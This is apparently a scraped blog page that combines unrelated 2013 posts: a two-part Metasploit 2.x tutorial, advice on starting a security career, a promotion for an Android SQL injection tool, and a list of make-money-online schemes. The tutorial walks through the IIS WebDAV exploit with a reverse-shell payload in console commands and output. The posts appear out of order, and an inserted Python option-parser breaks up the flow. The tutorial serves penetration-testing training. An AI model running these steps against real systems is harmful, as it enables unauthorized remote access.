Monday, May 27, 2013

What do we want a successful attack to do?

What Metasploit calls a payload, many others refer to as shell code or opcode. This is the code that we
want inserted directly into the buffer that we are overflowing. In most cases the shell code is going
to be service pack dependent, OS dependent, and architecture (i386) dependent as well. This means that
most of the payloads in the Metasploit framework will work only on certain operating systems and on certain
processors. Even if you select an appropriate payload, you will have to configure options to get the payload
to work. The most frequently used type of shell code generates a reverse shell from the compromised
system back to the attacking system. The command stubs mentioned in the exploits section also apply to
payloads. If you type: show payloads

You should see a response like the below.

msf iis50_webdav_ntdll > show payloads
Metasploit Framework Usable Payloads
====================================
  win32_bind                   Windows Bind Shell
  win32_bind_dllinject         Windows Bind DLL Inject
  win32_bind_meterpreter       Windows Bind Meterpreter DLL Inject
  win32_bind_stg               Windows Staged Bind Shell
  win32_bind_stg_upexec        Windows Staged Bind Upload/Execute
  win32_bind_vncinject         Windows Bind VNC Server DLL Inject
  win32_exec                   Windows Execute Command
  win32_reverse                Windows Reverse Shell
  win32_reverse_dllinject      Windows Reverse DLL Inject
  win32_reverse_meterpreter    Windows Reverse Meterpreter DLL Inject
  win32_reverse_stg            Windows Staged Reverse Shell
  win32_reverse_stg_upexec     Windows Staged Reverse Upload/Execute
  win32_reverse_vncinject      Windows Reverse VNC Server Inject

In this case the best shell to try will be the win32_reverse payload. To do this type: set PAYLOAD win32_reverse

This payload requires some options. These include the exit function, the local host and the local port.
To see these options type: show options

You should see something like the below:

msf iis50_webdav_ntdll(win32_reverse) > show options
Exploit and Payload Options
===========================
  Exploit:    Name      Default       Description
  --------    ------    -----------   ------------------
  optional    SSL                     Use SSL
  required    RHOST     67.36.70.19   The target address
  required    RPORT     80            The target port
  Payload:    Name        Default    Description
  --------    --------    -------    ------------------------------------------
  required    EXITFUNC    seh        Exit technique: "process", "thread", "seh"
  required    LHOST                  Local address to receive connection
  required    LPORT       4321       Local port to receive connection
  Target: Windows 2000 Bruteforce
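As an added example (not code from the original tutorial or from Metasploit itself), here is a small Python parser for the table that the 2.x "show options" command prints. It tags each row with its Exploit or Payload section and lists the required options that still have neither a default nor a value supplied with set; for the table above that is LHOST alone. The SHOW_OPTIONS string is a constructed copy of that output.

```python
# Added example, not part of the original tutorial: parse the table that
# Metasploit 2.x prints for "show options" and list the required options
# that still have no value, so you know what "set" must supply before
# "exploit" is run. SHOW_OPTIONS is constructed to mirror the post's table.
import re

SHOW_OPTIONS = """\
Exploit and Payload Options
===========================

  Exploit:    Name      Default       Description
  --------    ------    -----------   ------------------
  optional    SSL                     Use SSL
  required    RHOST     67.36.70.19   The target address
  required    RPORT     80            The target port

  Payload:    Name        Default    Description
  --------    --------    -------    ------------------------------------------
  required    EXITFUNC    seh        Exit technique: "process", "thread", "seh"
  required    LHOST                  Local address to receive connection
  required    LPORT       4321       Local port to receive connection

  Target: Windows 2000 Bruteforce
"""

HEADER = re.compile(r"^\s*(Exploit|Payload):\s+Name\s+Default\s+Description")
ROW = re.compile(r"^\s*(optional|required)\s")
# A cell is a run of words separated by single spaces; two or more spaces
# separate cells, which is how an empty Default column shows up.
CELL = re.compile(r"\S+(?: \S+)*")


def _cells(line, col_starts):
    """Assign each cell in a row to the header column whose start is nearest."""
    cells = [""] * len(col_starts)
    for m in CELL.finditer(line):
        col = min(range(len(col_starts)), key=lambda i: abs(col_starts[i] - m.start()))
        cells[col] = m.group()
    return cells


def parse_show_options(text):
    """Return one dict per option row, tagged with its Exploit/Payload section."""
    options, section, col_starts = [], None, None
    for line in text.splitlines():
        header = HEADER.match(line)
        if header:
            section = header.group(1)
            col_starts = (header.start(1), line.index("Name"),
                          line.index("Default"), line.index("Description"))
            continue
        if col_starts and ROW.match(line):
            requirement, name, default, description = _cells(line, col_starts)
            options.append({"section": section, "requirement": requirement,
                            "name": name, "default": default,
                            "description": description})
    return options


def missing_required(options, already_set=()):
    """Required options with neither a default nor a value given via 'set'."""
    return [o["name"] for o in options
            if o["requirement"] == "required" and not o["default"]
            and o["name"] not in already_set]


if __name__ == "__main__":
    opts = parse_show_options(SHOW_OPTIONS)
    for o in opts:
        print(f"{o['section']:8} {o['requirement']:8} {o['name']:9} "
              f"{o['default'] or '-':12} {o['description']}")
    print("still missing:", missing_required(opts))              # ['LHOST']
    print("after set LHOST:", missing_required(opts, {"LHOST"}))  # []
```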

To set the missing options, we will use the set command as above. Before we can set these values we
need to know what they are. To find your local IP address, open another shell window, either by
right-clicking on the desktop or (if your CD has this option) by looking for the computer icon in the
program bar. If you right-click on the desktop, look for the shell option. If you do this step right, you
should see a new shell box (this is like a DOS command prompt box on XP) appear.

Once you have the box open type: ifconfig

This will show the information for all of the interfaces on your Linux system. This is the equivalent of the
ipconfig command in Windows. What can you expect to see after typing 'ifconfig'?...

Network Penetration Testing or Application Security Assessment – Where to start from?

There have been a lot of similar questions regularly posted to us by aspiring information security experts. In the interest of future penetration testers and information security consultants entering the industry with the required expertise, and to answer these online queries, we made this blog entry.
There are many training companies in India alone which run training programs on network penetration testing or application security assessment. There are both good and bad training companies, and it is left to the candidates to research and select the right one. More importantly, apart from classroom training, aspiring information security experts need to self-practice in their home lab environment. After all, practice makes a man perfect! And certainly, boys need more practice than a man!
Jokes apart, in the 7 years since establishing our company, we have interviewed many fresh candidates who attended multiple courses in penetration testing and/or application security, but due to little or no self-practice, most of them were not able to think through and solve practical scenarios. At the time of writing this blog, we run very limited and exclusive training sessions, for government agencies, corporates and groups only, and we normally suggest our participants pick one of these two domains in the beginning, i.e. network penetration testing or application security testing, and move step by step. Once expertise is built in one domain, it should be convenient to start with the second, but not both together. A jack of all trades is only known as Jack; people still call them master of none!
But the question then is: which domain to pick first, or which is the easier one to start with?
The answer is simple, if not straightforward, with the pros and cons listed below:

Pros

Network Penetration Testing

  1. Easy to start with, since most of it is based on automated tools
  2. Nearly 70% of tasks can be handled by automated tools, and most of those come with an easy-to-use GUI
  3. With an MCSE, RHCE or CCNA background, testing appears to be easy

Application Security Testing

  1. Easy to set up a testing environment with limited resources
  2. A limited number of protocols and application attacks makes the domain quick to learn
  3. With moderate knowledge of any web programming (PHP, .Net, J2EE, Rails, etc.), testing goes easily

Cons

Network Penetration Testing

  1. A deep understanding of networking (OSI, TCP/IP), protocols (HTTP, FTP, SMTP, LDAP, etc.) and operating systems (Linux, Windows, etc.) is required. 0-days/custom exploits, social engineering and client-side attacks are domains in themselves, better not mixed in at the beginning. They are learned automatically as time and experience go by, provided there is interest to learn
  2. An understanding of various enterprise network components, architectures and deployments is required, which comes with experience or by taking extensive testing exercises
  3. Setting up a lab with a bunch of vulnerable/misconfigured machines requires considerable computing power, time to install, or bandwidth to download the vulnerable virtual machines available online
  4. Setting up a real device (firewall, IPS, VPN, switch, etc.) is even more expensive

Application Security Testing

  1. Depends mostly on manual testing due to the limitations of automated tools; it needs a lot of practice to identify the bugs quickly, along with a logical approach to the testing. There comes the human brain!
  2. Needs basic knowledge of almost all programming languages along with different web technologies (SOAP, REST API, AJAX, Flash), databases (Sybase, Oracle, MySQL, Mongo, etc.), web application firewalls, load balancers, etc. Though, if you start with selected technologies and good fundamentals, it is easy to scale
  3. You will hardly ever hit exactly the same bug again. Every application is a new application, so the focus is required more on fundamental concepts than on applications or programming languages.

A few points to be considered before pursuing information security as a career option:

  1. No training course or trainer can make you a penetration testing or application security expert; only you can, by devoting time, energy, dedication and devotion.
  2. The best way to learn is to create the vulnerable system or application yourself and learn by tweaking the scenarios and attacking it
  3. In information security, follow a "never give up" approach. If you couldn't do it, no one else should be able to do it
  4. There is no such thing as 99.999% security; you need to either call it 100% secured or 0% secured. The 0.00001% of vulnerability left behind can do the same damage as 100%, so there is no difference
  5. This is a game of trust, ethics and integrity; if you lack the courage to carry them, better search for another career option. Information security is a small world even on the global map, you never know!
  6. Knowledge is in the mind and not on the piece of paper which people call a "Certificate". Focus on knowledge first and then certificates, rather than attaining a bunch of certificates with no knowledge

I am personally not in favor of spending hard-earned money on attending ethical hacking training, and then cursing the trainer for not covering the important topics or not teaching the promised contents. There is more than enough content on this subject available on the Internet; your courage to find those good resources, and to learn and practice them, eventually becomes a strength to conquer any situation.
Though the idea is not to discourage attending training courses, there has to be a realization amongst the aspirants that the information security domain requires more self-practice, by thinking up different scenarios and hitting at them, than simply attending classroom-style training or gaining a piece of paper to start calling themselves "Blah Certified Ethical Hacker", whatever.
My next blog entries should help learners with the technologies to learn in the beginning, in a step-by-step approach, in both the network penetration testing and application security testing domains.

Android App :- Droidsqli
By Shinigami
Description: DroidSQLi is the first automated MySQL Injection tool for Android. It allows you to test your MySQL-based web application against SQL injection attacks.
DroidSQLi supports the following injection techniques:
- Time based injection
- Blind injection
- Error based injection
- Normal injection
Also, please have a look at our online courses
Recent Launch -SecurityTube iOS Security Expert & SecurityTube Linux Assembly Expert (SLAE)

Metasploit: Step-by-step
The steps below are for use with the BackTrack Distro.
For Downloading BackTrack:
http://www.backtrack-linux.org/downloads/
To begin, boot to your CD and pull up a shell window. From there you will need to move to the Metasploit directory. To do this from a command prompt type:
cd pentest/exploits/framework-2.3/
Launch the Metasploit console. To do this, from a command line type the following:
# ./msfconsole
Pick which exploit to use!
Once the msfconsole is running, it is time to decide which exploit to attempt against the target system.
Your options here stem from the following commands:
use
show
info
The use command will tell the utility exactly which exploit to select.
After "use", configure the options:
We've selected our exploit, but we are not done yet. We need to set options. These options include the destination IP and the destination port. The options are configured by using the set command. The show advanced command will let you know if there are more options that can be set. Most exploits do not have advanced options.
Start by typing: show options
This will show you the settings required to run the exploit.
These include RHOST (this is the host that we are going to compromise) and RPORT (this is the port that the vulnerable service is running on).
To set these options type:
set RHOST <your partner machine's IP address>
On the next line type:
set RPORT 80
Is the exploit going to work?
We have a system, we have an exploit. Are we going to be able to compromise the system? Now is the time to find out. To perform the check type: check
This may not work with all exploits. It checks whether the server or target appears vulnerable.
If you type: show targets, you should see something like the below:
msf iis50_webdav_ntdll > show targets
Supported Exploit Targets
=========================
0 Windows 2000 Bruteforce
Now you have the basics. Tomorrow we will publish the second part, and you will find out:
What do we want a successful attack to do? We will also show you how to perform such an attack.
Stay tuned!

Thursday, May 23, 2013

10 Different Methods To Make Money Online

Web marketing is one of the biggest sources of making money, whether you are earning online as a profession or as part-time work. The Internet is the best way, but it is not so easy to survive online, because there are too many ways to make money online, and the difficult part is choosing which one is easy to understand and also earns better.
So today I decided to discuss the different online methods. I have already discussed ways to make money from ads. These are 12 combined ways for everyone who has less knowledge about web design or other technical skills.

1. Cost Per Click ( CPC )

This method is based on earning from clicks on ads published on your site, web pages, forum or any app. I have already discussed CPC in my article about ads. If you want to learn more about CPC in detail, read my article about ways to make money from ads.
The best cost-per-click networks, which offer the best rates for every click, are:

Google Adsense:- It is one of the biggest and most popular networks, trusted by everyone. Google Adsense offers the highest CPC and CPM rates. But its earnings depend totally on your visitors' location and CTR as well. It is not so easy to get Adsense approval.

Media.net:- This is a new network formed by a partnership of Yahoo and Bing with Media.net. It is a good competitor to Adsense. It offers good CPC rates compared to others.

Chitika:- It is also a very popular network for CPC. It also offers good revenue from ads, but slightly less than Adsense.

Infolinks:- It is one of the best programs for text-based ads. It offers good revenue for in-text link ads and for other banner ads as well.

Bidvertiser:- It is also relatively good compared to others, but it pays less than the programs above. Still, it is a good one.

2. Cost Per Mille ( CPM )

This method is based on earning from every impression made on ads published on your website or blog. For every 1000 unique impressions you will earn money. But the difficult task is to choose the best network, the one which offers the best rates. It is also known as the CPM method.
Some of the best CPM networks are:


  • Tribalfusion
  • BrustMedia
  • BuysellAds
  • Valueclickmedia
  • VibrantMedia
  • Adpepper
  • Cpxinteractive
  • MadadsMedia


3. Sell Affiliates Products

Affiliate marketing is a commission-based program, meaning that for every successful sale made by you, you will earn a commission. In my recent article I discussed the Bigrock affiliate program, which offers a commission for every sale of domains and hosting plans. If you want to learn more about affiliates, then I suggest you read in more detail about affiliate programs.
Here are the best affiliates, which offer good commission:


  • Google Affiliates
  • ClickBank
  • Commission Junction
  • E-junkie
  • Amazon Affiliates
  • eBay Affiliates
  • DigiResult 
  • FreeLancer


4. Cost Per Action ( CPA )

In this method you will earn money for every successful action done by a user, as required on the spot. It is just like affiliates, but in this network the ads are about filling in details, subscribing to an email service or something similar. If someone fills in the details required by the ad, then you will earn for every successful action.


  • ClickBooth
  • Peerfly
  • CPAWay
  • MaxBounty
  • CPALead
  • NeverBlue
  • Mgcash


5. Earn From Uploading

There are many programs which are based on downloads. But in the last few years there have been many reports about increasing spam in these types of programs. It means you will earn for every successful download of your file. Some programs are premium-based, but some offer a free service.
Some trusted download networks are:


  • ShareCash.org
  • CashFile.org
  • Uploadables


6. Write For Other Sites

If you are interested in writing online, then this is the best way to make money. If you have knowledge about any specific topic or field, then the best way is to write articles for other services, or you can also hire yourself out to write for other blogs that want an author.
Below are some networks which pay you to write for them:


  • PayPerPost
  • Social Spark 
  • Sponsored Review
  • RevewMe
  • Payu2Blog 


7. Complete Online Surveys

This is one of the most effective and easiest ways for everyone who wants to make money online, because it doesn't require any web knowledge or technical skills. In this network you have to fill in accurate information for every question asked in the survey. This is the best way to make side earnings by working 2-3 hours on the internet.
Some of the best survey programs are:


  • MySurvey
  • Dollersurvey
  • SurveyMonkey
  • SurveySpot
  • Myview
  • ClearvoiceSurvey
  • Toluna
  • GlobalTestMarket


8. Online Projects / Freelance

It is a freelancer job, like data entry jobs. There are many programs in which you can apply with your application as per their rules. Then you have to complete a specific project or task. For every successfully completed project you will earn. There are many programs which are based on freelancer services.
Some networks which are based on freelancing are below:


  • Microworkers
  • Elance 
  • Fiverr
  • Odesk
  • BreakStudio
  • ConstantContent


9. Selling Products which you own

It is also an effective way to make money online if you have any product or service which you feel people would like to buy. You can also put your product in an online auction, which is a good idea to earn more. You can also design any product which you own. You can also sell some services or plans online to earn.


  • Amazon
  • eBay
  • Quikr
  • OLX
  • Sell.com
  • Gazelle.com


10. Selling Products which you don't own

It is just like affiliate marketing: selling any product which you don't own, but you can sell it for any direct advertiser or by using any network. You can also sell space on your website or blog for displaying ads of any product, which helps you earn money for every product sale.


  • Amazon Associates
  • ebay
  • Shirtcity
  • CafePress


Above are 10 different ways to start working online. I have tried to cover as many topics as possible. I hope all the above methods are clear and helpful for everyone; to make a bright future online you have to work hard. There are many other networks related to the above categories, but I have published those which I feel are the simplest and best.

/*If you find this article helpful, then please don't forget to share it with others. If you feel anything is missing or wrong, or have any doubt, feel free to share your view in the comment box below.*/

Happy Earning..
Enjoy(-_-)